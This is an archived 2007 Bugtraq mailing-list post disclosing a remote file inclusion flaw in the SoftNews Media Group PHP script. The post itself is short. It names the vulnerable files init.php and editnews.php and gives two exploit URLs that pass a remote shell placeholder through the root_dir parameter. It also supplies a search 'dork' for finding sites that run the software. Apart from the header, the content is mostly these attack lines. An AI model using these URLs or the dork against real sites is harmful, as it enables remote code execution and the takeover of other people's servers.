Bugtraq mailing list archives

Remote File Include In Script SoftNews Media Group


From: "RaeD Hasadya" <raed () bsdmail com>
Date: Sat, 10 Mar 2007 14:59:07 +0800

By Hasadya Raed
Contact : RaeD () BsdMail Com
------------------------------------
Script : SoftNews Media Group
Dork : "Copyright © 2004,2006 SoftNews Media Group"
Greetz : Only To Security Focus 
------------------------------------
B.Files : 
init.php
editnews.php
------------------------------------
Exploits:
http://www.Victim.com/engine/init.php?root_dir=[Shell-Attack]
http://www.Victim.com/engine/Ajax/editnews.php?root_dir=[Shell-Attack]
------------------------------------
By Hasadya Raed



-- 
_______________________________________________
Get your free email from http://bsdmail.com


Current thread: